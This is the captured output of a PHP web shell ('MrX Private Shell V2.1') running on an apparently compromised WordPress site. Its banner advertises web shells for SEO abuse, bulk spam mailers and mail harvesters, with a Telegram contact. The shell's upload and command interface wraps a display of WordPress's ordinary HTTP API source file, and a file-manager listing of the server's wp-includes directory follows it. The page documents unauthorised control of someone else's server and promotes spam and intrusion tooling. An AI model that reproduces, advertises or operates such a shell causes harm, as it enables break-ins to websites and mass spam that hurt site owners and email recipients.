__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Core HTTP Request API
 *
 * Standardizes the HTTP requests for WordPress. Handles cookies, gzip encoding and decoding, chunk
 * decoding, if HTTP 1.1 and various other difficult HTTP protocol implementations.
 *
 * @package WordPress
 * @subpackage HTTP
 */

/**
 * Returns the initialized WP_Http Object
 *
 * @since 2.7.0
 * @access private
 *
 * @return WP_Http HTTP Transport object.
 */
function _wp_http_get_object() {
	static $http = null;

	if ( is_null( $http ) ) {
		$http = new WP_Http();
	}
	return $http;
}

/**
 * Retrieves the raw response from a safe HTTP request.
 *
 * This function is ideal when the HTTP request is being made to an arbitrary
 * URL. The URL, and every URL it redirects to, are validated with wp_http_validate_url()
 * to avoid Server Side Request Forgery attacks (SSRF).
 *
 * @since 3.6.0
 *
 * @see wp_remote_request() For more information on the response array format.
 * @see WP_Http::request() For default arguments information.
 * @see wp_http_validate_url() For more information about how the URL is validated.
 *
 * @link https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
 *
 * @param string $url  URL to retrieve.
 * @param array  $args Optional. Request arguments. Default empty array.
 *                     See WP_Http::request() for information on accepted arguments.
 * @return array|WP_Error The response or WP_Error on failure.
 *                        See WP_Http::request() for information on return value.
 */
function wp_safe_remote_request( $url, $args = array() ) {
	$args['reject_unsafe_urls'] = true;
	$http                       = _wp_http_get_object();
	return $http->request( $url, $args );
}

/**
 * Retrieves the raw response from a safe HTTP request using the GET method.
 *
 * This function is ideal when the HTTP request is being made to an arbitrary
 * URL. The URL, and every URL it redirects to, are validated with wp_http_validate_url()
 * to avoid Server Side Request Forgery attacks (SSRF).
 *
 * @since 3.6.0
 *
 * @see wp_remote_request() For more information on the response array format.
 * @see WP_Http::request() For default arguments information.
 * @see wp_http_validate_url() For more information about how the URL is validated.
 *
 * @link https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
 *
 * @param string $url  URL to retrieve.
 * @param array  $args Optional. Request arguments. Default empty array.
 *                     See WP_Http::request() for information on accepted arguments.
 * @return array|WP_Error The response or WP_Error on failure.
 *                        See WP_Http::request() for information on return value.
 */
function wp_safe_remote_get( $url, $args = array() ) {
	$args['reject_unsafe_urls'] = true;
	$http                       = _wp_http_get_object();
	return $http->get( $url, $args );
}

/**
 * Retrieves the raw response from a safe HTTP request using the POST method.
 *
 * This function is ideal when the HTTP request is being made to an arbitrary
 * URL. The URL, and every URL it redirects to, are validated with wp_http_validate_url()
 * to avoid Server Side Request Forgery attacks (SSRF).
 *
 * @since 3.6.0
 *
 * @see wp_remote_request() For more information on the response array format.
 * @see WP_Http::request() For default arguments information.
 * @see wp_http_validate_url() For more information about how the URL is validated.
 *
 * @link https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
 *
 * @param string $url  URL to retrieve.
 * @param array  $args Optional. Request arguments. Default empty array.
 *                     See WP_Http::request() for information on accepted arguments.
 * @return array|WP_Error The response or WP_Error on failure.
 *                        See WP_Http::request() for information on return value.
 */
function wp_safe_remote_post( $url, $args = array() ) {
	$args['reject_unsafe_urls'] = true;
	$http                       = _wp_http_get_object();
	return $http->post( $url, $args );
}

/**
 * Retrieves the raw response from a safe HTTP request using the HEAD method.
 *
 * This function is ideal when the HTTP request is being made to an arbitrary
 * URL. The URL, and every URL it redirects to, are validated with wp_http_validate_url()
 * to avoid Server Side Request Forgery attacks (SSRF).
 *
 * @since 3.6.0
 *
 * @see wp_remote_request() For more information on the response array format.
 * @see WP_Http::request() For default arguments information.
 * @see wp_http_validate_url() For more information about how the URL is validated.
 *
 * @link https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
 *
 * @param string $url  URL to retrieve.
 * @param array  $args Optional. Request arguments. Default empty array.
 *                     See WP_Http::request() for information on accepted arguments.
 * @return array|WP_Error The response or WP_Error on failure.
 *                        See WP_Http::request() for information on return value.
 */
function wp_safe_remote_head( $url, $args = array() ) {
	$args['reject_unsafe_urls'] = true;
	$http                       = _wp_http_get_object();
	return $http->head( $url, $args );
}

/**
 * Performs an HTTP request and returns its response.
 *
 * There are other API functions available which abstract away the HTTP method:
 *
 *  - Default 'GET'  for wp_remote_get()
 *  - Default 'POST' for wp_remote_post()
 *  - Default 'HEAD' for wp_remote_head()
 *
 * @since 2.7.0
 *
 * @see WP_Http::request() For information on default arguments.
 *
 * @param string $url  URL to retrieve.
 * @param array  $args Optional. Request arguments. Default empty array.
 *                     See WP_Http::request() for information on accepted arguments.
 * @return array|WP_Error The response array or a WP_Error on failure.
 *                        See WP_Http::request() for information on return value.
 */
function wp_remote_request( $url, $args = array() ) {
	$http = _wp_http_get_object();
	return $http->request( $url, $args );
}

/**
 * Performs an HTTP request using the GET method and returns its response.
 *
 * @since 2.7.0
 *
 * @see wp_remote_request() For more information on the response array format.
 * @see WP_Http::request() For default arguments information.
 *
 * @param string $url  URL to retrieve.
 * @param array  $args Optional. Request arguments. Default empty array.
 *                     See WP_Http::request() for information on accepted arguments.
 * @return array|WP_Error The response or WP_Error on failure.
 *                        See WP_Http::request() for information on return value.
 */
function wp_remote_get( $url, $args = array() ) {
	$http = _wp_http_get_object();
	return $http->get( $url, $args );
}

/**
 * Performs an HTTP request using the POST method and returns its response.
 *
 * @since 2.7.0
 *
 * @see wp_remote_request() For more information on the response array format.
 * @see WP_Http::request() For default arguments information.
 *
 * @param string $url  URL to retrieve.
 * @param array  $args Optional. Request arguments. Default empty array.
 *                     See WP_Http::request() for information on accepted arguments.
 * @return array|WP_Error The response or WP_Error on failure.
 *                        See WP_Http::request() for information on return value.
 */
function wp_remote_post( $url, $args = array() ) {
	$http = _wp_http_get_object();
	return $http->post( $url, $args );
}

/**
 * Performs an HTTP request using the HEAD method and returns its response.
 *
 * @since 2.7.0
 *
 * @see wp_remote_request() For more information on the response array format.
 * @see WP_Http::request() For default arguments information.
 *
 * @param string $url  URL to retrieve.
 * @param array  $args Optional. Request arguments. Default empty array.
 *                     See WP_Http::request() for information on accepted arguments.
 * @return array|WP_Error The response or WP_Error on failure.
 *                        See WP_Http::request() for information on return value.
 */
function wp_remote_head( $url, $args = array() ) {
	$http = _wp_http_get_object();
	return $http->head( $url, $args );
}

/**
 * Retrieves only the headers from the raw response.
 *
 * @since 2.7.0
 * @since 4.6.0 Return value changed from an array to an WpOrg\Requests\Utility\CaseInsensitiveDictionary instance.
 *
 * @see \WpOrg\Requests\Utility\CaseInsensitiveDictionary
 *
 * @param array|WP_Error $response HTTP response.
 * @return \WpOrg\Requests\Utility\CaseInsensitiveDictionary|array The headers of the response, or empty array
 *                                                                 if incorrect parameter given.
 */
function wp_remote_retrieve_headers( $response ) {
	if ( is_wp_error( $response ) || ! isset( $response['headers'] ) ) {
		return array();
	}

	return $response['headers'];
}

/**
 * Retrieves a single header by name from the raw response.
 *
 * @since 2.7.0
 *
 * @param array|WP_Error $response HTTP response.
 * @param string         $header   Header name to retrieve value from.
 * @return array|string The header(s) value(s). Array if multiple headers with the same name are retrieved.
 *                      Empty string if incorrect parameter given, or if the header doesn't exist.
 */
function wp_remote_retrieve_header( $response, $header ) {
	if ( is_wp_error( $response ) || ! isset( $response['headers'] ) ) {
		return '';
	}

	if ( isset( $response['headers'][ $header ] ) ) {
		return $response['headers'][ $header ];
	}

	return '';
}

/**
 * Retrieves only the response code from the raw response.
 *
 * Will return an empty string if incorrect parameter value is given.
 *
 * @since 2.7.0
 *
 * @param array|WP_Error $response HTTP response.
 * @return int|string The response code as an integer. Empty string if incorrect parameter given.
 */
function wp_remote_retrieve_response_code( $response ) {
	if ( is_wp_error( $response ) || ! isset( $response['response'] ) || ! is_array( $response['response'] ) ) {
		return '';
	}

	return $response['response']['code'];
}

/**
 * Retrieves only the response message from the raw response.
 *
 * Will return an empty string if incorrect parameter value is given.
 *
 * @since 2.7.0
 *
 * @param array|WP_Error $response HTTP response.
 * @return string The response message. Empty string if incorrect parameter given.
 */
function wp_remote_retrieve_response_message( $response ) {
	if ( is_wp_error( $response ) || ! isset( $response['response'] ) || ! is_array( $response['response'] ) ) {
		return '';
	}

	return $response['response']['message'];
}

/**
 * Retrieves only the body from the raw response.
 *
 * @since 2.7.0
 *
 * @param array|WP_Error $response HTTP response.
 * @return string The body of the response. Empty string if no body or incorrect parameter given.
 */
function wp_remote_retrieve_body( $response ) {
	if ( is_wp_error( $response ) || ! isset( $response['body'] ) ) {
		return '';
	}

	return $response['body'];
}

/**
 * Retrieves only the cookies from the raw response.
 *
 * @since 4.4.0
 *
 * @param array|WP_Error $response HTTP response.
 * @return WP_Http_Cookie[] An array of `WP_Http_Cookie` objects from the response.
 *                          Empty array if there are none, or the response is a WP_Error.
 */
function wp_remote_retrieve_cookies( $response ) {
	if ( is_wp_error( $response ) || empty( $response['cookies'] ) ) {
		return array();
	}

	return $response['cookies'];
}

/**
 * Retrieves a single cookie by name from the raw response.
 *
 * @since 4.4.0
 *
 * @param array|WP_Error $response HTTP response.
 * @param string         $name     The name of the cookie to retrieve.
 * @return WP_Http_Cookie|string The `WP_Http_Cookie` object, or empty string
 *                               if the cookie is not present in the response.
 */
function wp_remote_retrieve_cookie( $response, $name ) {
	$cookies = wp_remote_retrieve_cookies( $response );

	if ( empty( $cookies ) ) {
		return '';
	}

	foreach ( $cookies as $cookie ) {
		if ( $cookie->name === $name ) {
			return $cookie;
		}
	}

	return '';
}

/**
 * Retrieves a single cookie's value by name from the raw response.
 *
 * @since 4.4.0
 *
 * @param array|WP_Error $response HTTP response.
 * @param string         $name     The name of the cookie to retrieve.
 * @return string The value of the cookie, or empty string
 *                if the cookie is not present in the response.
 */
function wp_remote_retrieve_cookie_value( $response, $name ) {
	$cookie = wp_remote_retrieve_cookie( $response, $name );

	if ( ! ( $cookie instanceof WP_Http_Cookie ) ) {
		return '';
	}

	return $cookie->value;
}

/**
 * Determines if there is an HTTP Transport that can process this request.
 *
 * @since 3.2.0
 *
 * @param array  $capabilities Array of capabilities to test or a wp_remote_request() $args array.
 * @param string $url          Optional. If given, will check if the URL requires SSL and adds
 *                             that requirement to the capabilities array.
 *
 * @return bool
 */
function wp_http_supports( $capabilities = array(), $url = null ) {
	$capabilities = wp_parse_args( $capabilities );

	$count = count( $capabilities );

	// If we have a numeric $capabilities array, spoof a wp_remote_request() associative $args array.
	if ( $count && count( array_filter( array_keys( $capabilities ), 'is_numeric' ) ) === $count ) {
		$capabilities = array_combine( array_values( $capabilities ), array_fill( 0, $count, true ) );
	}

	if ( $url && ! isset( $capabilities['ssl'] ) ) {
		$scheme = parse_url( $url, PHP_URL_SCHEME );
		if ( 'https' === $scheme || 'ssl' === $scheme ) {
			$capabilities['ssl'] = true;
		}
	}

	return WpOrg\Requests\Requests::has_capabilities( $capabilities );
}

/**
 * Gets the HTTP Origin of the current request.
 *
 * @since 3.4.0
 *
 * @return string URL of the origin. Empty string if no origin.
 */
function get_http_origin() {
	$origin = '';
	if ( ! empty( $_SERVER['HTTP_ORIGIN'] ) ) {
		$origin = $_SERVER['HTTP_ORIGIN'];
	}

	/**
	 * Changes the origin of an HTTP request.
	 *
	 * @since 3.4.0
	 *
	 * @param string $origin The original origin for the request.
	 */
	return apply_filters( 'http_origin', $origin );
}

/**
 * Retrieves list of allowed HTTP origins.
 *
 * @since 3.4.0
 *
 * @return string[] Array of origin URLs.
 */
function get_allowed_http_origins() {
	$admin_origin = parse_url( admin_url() );
	$home_origin  = parse_url( home_url() );

	// @todo Preserve port?
	$allowed_origins = array_unique(
		array(
			'http://' . $admin_origin['host'],
			'https://' . $admin_origin['host'],
			'http://' . $home_origin['host'],
			'https://' . $home_origin['host'],
		)
	);

	/**
	 * Changes the origin types allowed for HTTP requests.
	 *
	 * @since 3.4.0
	 *
	 * @param string[] $allowed_origins {
	 *     Array of default allowed HTTP origins.
	 *
	 *     @type string $0 Non-secure URL for admin origin.
	 *     @type string $1 Secure URL for admin origin.
	 *     @type string $2 Non-secure URL for home origin.
	 *     @type string $3 Secure URL for home origin.
	 * }
	 */
	return apply_filters( 'allowed_http_origins', $allowed_origins );
}

/**
 * Determines if the HTTP origin is an authorized one.
 *
 * @since 3.4.0
 *
 * @param string|null $origin Origin URL. If not provided, the value of get_http_origin() is used.
 * @return string Origin URL if allowed, empty string if not.
 */
function is_allowed_http_origin( $origin = null ) {
	$origin_arg = $origin;

	if ( null === $origin ) {
		$origin = get_http_origin();
	}

	if ( $origin && ! in_array( $origin, get_allowed_http_origins(), true ) ) {
		$origin = '';
	}

	/**
	 * Changes the allowed HTTP origin result.
	 *
	 * @since 3.4.0
	 *
	 * @param string $origin     Origin URL if allowed, empty string if not.
	 * @param string $origin_arg Original origin string passed into is_allowed_http_origin function.
	 */
	return apply_filters( 'allowed_http_origin', $origin, $origin_arg );
}

/**
 * Sends Access-Control-Allow-Origin and related headers if the current request
 * is from an allowed origin.
 *
 * If the request is an OPTIONS request, the script exits with either access
 * control headers sent, or a 403 response if the origin is not allowed. For
 * other request methods, you will receive a return value.
 *
 * @since 3.4.0
 *
 * @return string|false Returns the origin URL if headers are sent. Returns false
 *                      if headers are not sent.
 */
function send_origin_headers() {
	$origin = get_http_origin();

	if ( is_allowed_http_origin( $origin ) ) {
		header( 'Access-Control-Allow-Origin: ' . $origin );
		header( 'Access-Control-Allow-Credentials: true' );
		if ( 'OPTIONS' === $_SERVER['REQUEST_METHOD'] ) {
			exit;
		}
		return $origin;
	}

	if ( 'OPTIONS' === $_SERVER['REQUEST_METHOD'] ) {
		status_header( 403 );
		exit;
	}

	return false;
}

/**
 * Validates a URL for safe use in the HTTP API.
 *
 * Examples of URLs that are considered unsafe:
 *
 * - ftp://example.com/caniload.php - Invalid protocol - only http and https are allowed.
 * - http:///example.com/caniload.php - Malformed URL.
 * - http://user:[email protected]/caniload.php - Login information.
 * - http://example.invalid/caniload.php - Invalid hostname, as the IP cannot be looked up in DNS.
 *
 * Examples of URLs that are considered unsafe by default:
 *
 * - http://192.168.0.1/caniload.php - IPs from LAN networks.
 *   This can be changed with the {@see 'http_request_host_is_external'} filter.
 * - http://198.143.164.252:81/caniload.php - By default, only 80, 443, and 8080 ports are allowed.
 *   This can be changed with the {@see 'http_allowed_safe_ports'} filter.
 *
 * @since 3.5.2
 *
 * @param string $url Request URL.
 * @return string|false URL or false on failure.
 */
function wp_http_validate_url( $url ) {
	if ( ! is_string( $url ) || '' === $url || is_numeric( $url ) ) {
		return false;
	}

	$original_url = $url;
	$url          = wp_kses_bad_protocol( $url, array( 'http', 'https' ) );
	if ( ! $url || strtolower( $url ) !== strtolower( $original_url ) ) {
		return false;
	}

	$parsed_url = parse_url( $url );
	if ( ! $parsed_url || empty( $parsed_url['host'] ) ) {
		return false;
	}

	if ( isset( $parsed_url['user'] ) || isset( $parsed_url['pass'] ) ) {
		return false;
	}

	if ( false !== strpbrk( $parsed_url['host'], ':#?[]' ) ) {
		return false;
	}

	$parsed_home = parse_url( get_option( 'home' ) );
	$same_host   = isset( $parsed_home['host'] ) && strtolower( $parsed_home['host'] ) === strtolower( $parsed_url['host'] );
	$host        = trim( $parsed_url['host'], '.' );

	if ( ! $same_host ) {
		if ( preg_match( '#^(([1-9]?\d|1\d\d|25[0-5]|2[0-4]\d)\.){3}([1-9]?\d|1\d\d|25[0-5]|2[0-4]\d)$#', $host ) ) {
			$ip = $host;
		} else {
			$ip = gethostbyname( $host );
			if ( $ip === $host ) { // Error condition for gethostbyname().
				return false;
			}
		}
		if ( $ip ) {
			$parts = array_map( 'intval', explode( '.', $ip ) );
			if ( 127 === $parts[0] || 10 === $parts[0] || 0 === $parts[0]
				|| ( 172 === $parts[0] && 16 <= $parts[1] && 31 >= $parts[1] )
				|| ( 192 === $parts[0] && 168 === $parts[1] )
			) {
				// If host appears local, reject unless specifically allowed.
				/**
				 * Checks if HTTP request is external or not.
				 *
				 * Allows to change and allow external requests for the HTTP request.
				 *
				 * @since 3.6.0
				 *
				 * @param bool   $external Whether HTTP request is external or not.
				 * @param string $host     Host name of the requested URL.
				 * @param string $url      Requested URL.
				 */
				if ( ! apply_filters( 'http_request_host_is_external', false, $host, $url ) ) {
					return false;
				}
			}
		}
	}

	if ( empty( $parsed_url['port'] ) ) {
		return $url;
	}

	$port = $parsed_url['port'];

	/**
	 * Controls the list of ports considered safe in HTTP API.
	 *
	 * Allows to change and allow external requests for the HTTP request.
	 *
	 * @since 5.9.0
	 *
	 * @param int[]  $allowed_ports Array of integers for valid ports.
	 * @param string $host          Host name of the requested URL.
	 * @param string $url           Requested URL.
	 */
	$allowed_ports = apply_filters( 'http_allowed_safe_ports', array( 80, 443, 8080 ), $host, $url );
	if ( is_array( $allowed_ports ) && in_array( $port, $allowed_ports, true ) ) {
		return $url;
	}

	if ( $parsed_home && $same_host && isset( $parsed_home['port'] ) && $parsed_home['port'] === $port ) {
		return $url;
	}

	return false;
}

/**
 * Marks allowed redirect hosts safe for HTTP requests as well.
 *
 * Attached to the {@see 'http_request_host_is_external'} filter.
 *
 * @since 3.6.0
 *
 * @param bool   $is_external
 * @param string $host
 * @return bool
 */
function allowed_http_request_hosts( $is_external, $host ) {
	if ( ! $is_external && wp_validate_redirect( 'http://' . $host ) ) {
		$is_external = true;
	}
	return $is_external;
}

/**
 * Adds any domain in a multisite installation for safe HTTP requests to the
 * allowed list.
 *
 * Attached to the {@see 'http_request_host_is_external'} filter.
 *
 * @since 3.6.0
 *
 * @global wpdb $wpdb WordPress database abstraction object.
 *
 * @param bool   $is_external
 * @param string $host
 * @return bool
 */
function ms_allowed_http_request_hosts( $is_external, $host ) {
	global $wpdb;
	static $queried = array();
	if ( $is_external ) {
		return $is_external;
	}
	if ( get_network()->domain === $host ) {
		return true;
	}
	if ( isset( $queried[ $host ] ) ) {
		return $queried[ $host ];
	}
	$queried[ $host ] = (bool) $wpdb->get_var( $wpdb->prepare( "SELECT domain FROM $wpdb->blogs WHERE domain = %s LIMIT 1", $host ) );
	return $queried[ $host ];
}

/**
 * A wrapper for PHP's parse_url() function that handles consistency in the return values
 * across PHP versions.
 *
 * Across various PHP versions, schemeless URLs containing a ":" in the query
 * are being handled inconsistently. This function works around those differences.
 *
 * @since 4.4.0
 * @since 4.7.0 The `$component` parameter was added for parity with PHP's `parse_url()`.
 *
 * @link https://www.php.net/manual/en/function.parse-url.php
 *
 * @param string $url       The URL to parse.
 * @param int    $component The specific component to retrieve. Use one of the PHP
 *                          predefined constants to specify which one.
 *                          Defaults to -1 (= return all parts as an array).
 * @return mixed False on parse failure; Array of URL components on success;
 *               When a specific component has been requested: null if the component
 *               doesn't exist in the given URL; a string or - in the case of
 *               PHP_URL_PORT - integer when it does. See parse_url()'s return values.
 */
function wp_parse_url( $url, $component = -1 ) {
	$to_unset = array();
	$url      = (string) $url;

	if ( str_starts_with( $url, '//' ) ) {
		$to_unset[] = 'scheme';
		$url        = 'placeholder:' . $url;
	} elseif ( str_starts_with( $url, '/' ) ) {
		$to_unset[] = 'scheme';
		$to_unset[] = 'host';
		$url        = 'placeholder://placeholder' . $url;
	}

	$parts = parse_url( $url );

	if ( false === $parts ) {
		// Parsing failure.
		return $parts;
	}

	// Remove the placeholder values.
	foreach ( $to_unset as $key ) {
		unset( $parts[ $key ] );
	}

	return _get_component_from_parsed_url_array( $parts, $component );
}

/**
 * Retrieves a specific component from a parsed URL array.
 *
 * @internal
 *
 * @since 4.7.0
 * @access private
 *
 * @link https://www.php.net/manual/en/function.parse-url.php
 *
 * @param array|false $url_parts The parsed URL. Can be false if the URL failed to parse.
 * @param int         $component The specific component to retrieve. Use one of the PHP
 *                               predefined constants to specify which one.
 *                               Defaults to -1 (= return all parts as an array).
 * @return mixed False on parse failure; Array of URL components on success;
 *               When a specific component has been requested: null if the component
 *               doesn't exist in the given URL; a string or - in the case of
 *               PHP_URL_PORT - integer when it does. See parse_url()'s return values.
 */
function _get_component_from_parsed_url_array( $url_parts, $component = -1 ) {
	if ( -1 === $component ) {
		return $url_parts;
	}

	$key = _wp_translate_php_url_constant_to_key( $component );
	if ( false !== $key && is_array( $url_parts ) && isset( $url_parts[ $key ] ) ) {
		return $url_parts[ $key ];
	} else {
		return null;
	}
}

/**
 * Translates a PHP_URL_* constant to the named array keys PHP uses.
 *
 * @internal
 *
 * @since 4.7.0
 * @access private
 *
 * @link https://www.php.net/manual/en/url.constants.php
 *
 * @param int $constant PHP_URL_* constant.
 * @return string|false The named key or false.
 */
function _wp_translate_php_url_constant_to_key( $constant ) {
	$translation = array(
		PHP_URL_SCHEME   => 'scheme',
		PHP_URL_HOST     => 'host',
		PHP_URL_PORT     => 'port',
		PHP_URL_USER     => 'user',
		PHP_URL_PASS     => 'pass',
		PHP_URL_PATH     => 'path',
		PHP_URL_QUERY    => 'query',
		PHP_URL_FRAGMENT => 'fragment',
	);

	if ( isset( $translation[ $constant ] ) ) {
		return $translation[ $constant ];
	} else {
		return false;
	}
}

Filemanager

Name Type Size Permission Actions
ID3 Folder 0750
IXR Folder 0750
PHPMailer Folder 0750
Requests Folder 0750
SimplePie Folder 0750
Text Folder 0750
assets Folder 0750
block-bindings Folder 0750
block-patterns Folder 0750
block-supports Folder 0750
blocks Folder 0750
certificates Folder 0750
css Folder 0750
customize Folder 0750
fonts Folder 0750
html-api Folder 0750
images Folder 0750
interactivity-api Folder 0750
js Folder 0750
l10n Folder 0750
php-compat Folder 0750
pomo Folder 0750
rest-api Folder 0750
sitemaps Folder 0750
sodium_compat Folder 0750
style-engine Folder 0750
theme-compat Folder 0750
widgets Folder 0750
admin-bar.php File 36.24 KB 0640
atomlib.php File 11.79 KB 0640
author-template.php File 18.51 KB 0640
block-bindings.php File 5.46 KB 0640
block-editor.php File 28.12 KB 0640
block-i18n.json File 316 B 0640
block-patterns.php File 12.9 KB 0640
block-template-utils.php File 60.46 KB 0640
block-template.php File 15 KB 0640
blocks.php File 110.4 KB 0640
bookmark-template.php File 12.47 KB 0640
bookmark.php File 15.07 KB 0640
cache-compat.php File 5.83 KB 0640
cache.php File 13.16 KB 0640
canonical.php File 33.71 KB 0640
capabilities.php File 41.72 KB 0640
category-template.php File 55.67 KB 0640
category.php File 12.53 KB 0640
class-IXR.php File 2.55 KB 0640
class-avif-info.php File 28.92 KB 0640
class-feed.php File 539 B 0640
class-http.php File 367 B 0640
class-json.php File 42.66 KB 0640
class-oembed.php File 401 B 0640
class-phpass.php File 6.61 KB 0640
class-phpmailer.php File 664 B 0640
class-pop3.php File 20.63 KB 0640
class-requests.php File 2.18 KB 0640
class-simplepie.php File 453 B 0640
class-smtp.php File 457 B 0640
class-snoopy.php File 36.83 KB 0640
class-walker-category-dropdown.php File 2.41 KB 0640
class-walker-category.php File 8.28 KB 0640
class-walker-comment.php File 13.89 KB 0640
class-walker-nav-menu.php File 11.76 KB 0640
class-walker-page-dropdown.php File 2.65 KB 0640
class-walker-page.php File 7.43 KB 0640
class-wp-admin-bar.php File 17.46 KB 0640
class-wp-ajax-response.php File 5.14 KB 0640
class-wp-application-passwords.php File 16.7 KB 0640
class-wp-block-bindings-registry.php File 8.26 KB 0640
class-wp-block-bindings-source.php File 2.92 KB 0640
class-wp-block-editor-context.php File 1.32 KB 0640
class-wp-block-list.php File 4.65 KB 0640
class-wp-block-metadata-registry.php File 11.62 KB 0640
class-wp-block-parser-block.php File 2.5 KB 0640
class-wp-block-parser-frame.php File 1.97 KB 0640
class-wp-block-parser.php File 11.26 KB 0640
class-wp-block-pattern-categories-registry.php File 5.25 KB 0640
class-wp-block-patterns-registry.php File 10.53 KB 0640
class-wp-block-styles-registry.php File 6.25 KB 0640
class-wp-block-supports.php File 5.49 KB 0640
class-wp-block-template.php File 1.99 KB 0640
class-wp-block-templates-registry.php File 7.06 KB 0640
class-wp-block-type-registry.php File 4.9 KB 0640
class-wp-block-type.php File 16.86 KB 0640
class-wp-block.php File 22.5 KB 0640
class-wp-classic-to-block-menu-converter.php File 3.99 KB 0640
class-wp-comment-query.php File 47.26 KB 0640
class-wp-comment.php File 9.22 KB 0640
class-wp-customize-control.php File 25.25 KB 0640
class-wp-customize-manager.php File 197.84 KB 0640
class-wp-customize-nav-menus.php File 56.31 KB 0640
class-wp-customize-panel.php File 10.46 KB 0640
class-wp-customize-section.php File 10.95 KB 0640
class-wp-customize-setting.php File 29.26 KB 0640
class-wp-customize-widgets.php File 70.52 KB 0640
class-wp-date-query.php File 34.89 KB 0640
class-wp-dependencies.php File 14.78 KB 0640
class-wp-dependency.php File 2.57 KB 0640
class-wp-duotone.php File 39.83 KB 0640
class-wp-editor.php File 70.64 KB 0640
class-wp-embed.php File 15.56 KB 0640
class-wp-error.php File 7.33 KB 0640
class-wp-exception.php File 253 B 0640
class-wp-fatal-error-handler.php File 7.96 KB 0640
class-wp-feed-cache-transient.php File 3.1 KB 0640
class-wp-feed-cache.php File 969 B 0640
class-wp-hook.php File 15.63 KB 0640
class-wp-http-cookie.php File 7.22 KB 0640
class-wp-http-curl.php File 12.25 KB 0640
class-wp-http-encoding.php File 6.53 KB 0640
class-wp-http-ixr-client.php File 3.42 KB 0640
class-wp-http-proxy.php File 5.84 KB 0640
class-wp-http-requests-hooks.php File 1.97 KB 0640
class-wp-http-requests-response.php File 4.3 KB 0640
class-wp-http-response.php File 2.91 KB 0640
class-wp-http-streams.php File 16.46 KB 0640
class-wp-http.php File 40.6 KB 0640
class-wp-image-editor-gd.php File 19.69 KB 0640
class-wp-image-editor-imagick.php File 33.92 KB 0640
class-wp-image-editor.php File 17.12 KB 0640
class-wp-list-util.php File 7.27 KB 0640
class-wp-locale-switcher.php File 6.62 KB 0640
class-wp-locale.php File 16.49 KB 0640
class-wp-matchesmapregex.php File 1.79 KB 0640
class-wp-meta-query.php File 29.82 KB 0640
class-wp-metadata-lazyloader.php File 6.67 KB 0640
class-wp-navigation-fallback.php File 9 KB 0640
class-wp-network-query.php File 19.39 KB 0640
class-wp-network.php File 12.01 KB 0640
class-wp-object-cache.php File 17.11 KB 0640
class-wp-oembed-controller.php File 6.74 KB 0640
class-wp-oembed.php File 30.87 KB 0640
class-wp-paused-extensions-storage.php File 4.99 KB 0640
class-wp-phpmailer.php File 3.71 KB 0640
class-wp-plugin-dependencies.php File 24.72 KB 0640
class-wp-post-type.php File 29.96 KB 0640
class-wp-post.php File 6.34 KB 0640
class-wp-query.php File 154.32 KB 0640
class-wp-recovery-mode-cookie-service.php File 6.72 KB 0640
class-wp-recovery-mode-email-service.php File 10.92 KB 0640
class-wp-recovery-mode-key-service.php File 4.77 KB 0640
class-wp-recovery-mode-link-service.php File 3.38 KB 0640
class-wp-recovery-mode.php File 11.18 KB 0640
class-wp-rewrite.php File 62.2 KB 0640
class-wp-role.php File 2.46 KB 0640
class-wp-roles.php File 8.38 KB 0640
class-wp-script-modules.php File 19.01 KB 0640
class-wp-scripts.php File 27.68 KB 0640
class-wp-session-tokens.php File 7.15 KB 0640
class-wp-simplepie-file.php File 3.33 KB 0640
class-wp-simplepie-sanitize-kses.php File 1.87 KB 0640
class-wp-site-query.php File 30.88 KB 0640
class-wp-site.php File 7.28 KB 0640
class-wp-speculation-rules.php File 7.35 KB 0640
class-wp-styles.php File 10.75 KB 0640
class-wp-tax-query.php File 19.1 KB 0640
class-wp-taxonomy.php File 18.12 KB 0640
class-wp-term-query.php File 39.91 KB 0640
class-wp-term.php File 5.17 KB 0640
class-wp-text-diff-renderer-inline.php File 979 B 0640
class-wp-text-diff-renderer-table.php File 18.44 KB 0640
class-wp-textdomain-registry.php File 10.24 KB 0640
class-wp-theme-json-data.php File 1.77 KB 0640
class-wp-theme-json-resolver.php File 34.9 KB 0640
class-wp-theme-json-schema.php File 7.19 KB 0640
class-wp-theme-json.php File 159.71 KB 0640
class-wp-theme.php File 64.27 KB 0640
class-wp-token-map.php File 27.95 KB 0640
class-wp-url-pattern-prefixer.php File 4.69 KB 0640
class-wp-user-meta-session-tokens.php File 2.92 KB 0640
class-wp-user-query.php File 42.63 KB 0640
class-wp-user-request.php File 2.25 KB 0640
class-wp-user.php File 22.46 KB 0640
class-wp-walker.php File 13.01 KB 0640
class-wp-widget-factory.php File 3.27 KB 0640
class-wp-widget.php File 18 KB 0640
class-wp-xmlrpc-server.php File 210.39 KB 0640
class-wp.php File 25.7 KB 0640
class-wpdb.php File 115.51 KB 0640
class.wp-dependencies.php File 373 B 0640
class.wp-scripts.php File 343 B 0640
class.wp-styles.php File 338 B 0640
comment-template.php File 100.69 KB 0640
comment.php File 128.46 KB 0640
compat.php File 15.99 KB 0640
cron.php File 41.66 KB 0640
date.php File 400 B 0640
default-constants.php File 11.1 KB 0640
default-filters.php File 35.84 KB 0640
default-widgets.php File 2.24 KB 0640
deprecated.php File 187.07 KB 0640
embed-template.php File 338 B 0640
embed.php File 37.28 KB 0640
error-protection.php File 4.02 KB 0640
feed-atom-comments.php File 5.38 KB 0640
feed-atom.php File 3.05 KB 0640
feed-rdf.php File 2.61 KB 0640
feed-rss.php File 1.16 KB 0640
feed-rss2-comments.php File 4.04 KB 0640
feed-rss2.php File 3.71 KB 0640
feed.php File 22.86 KB 0640
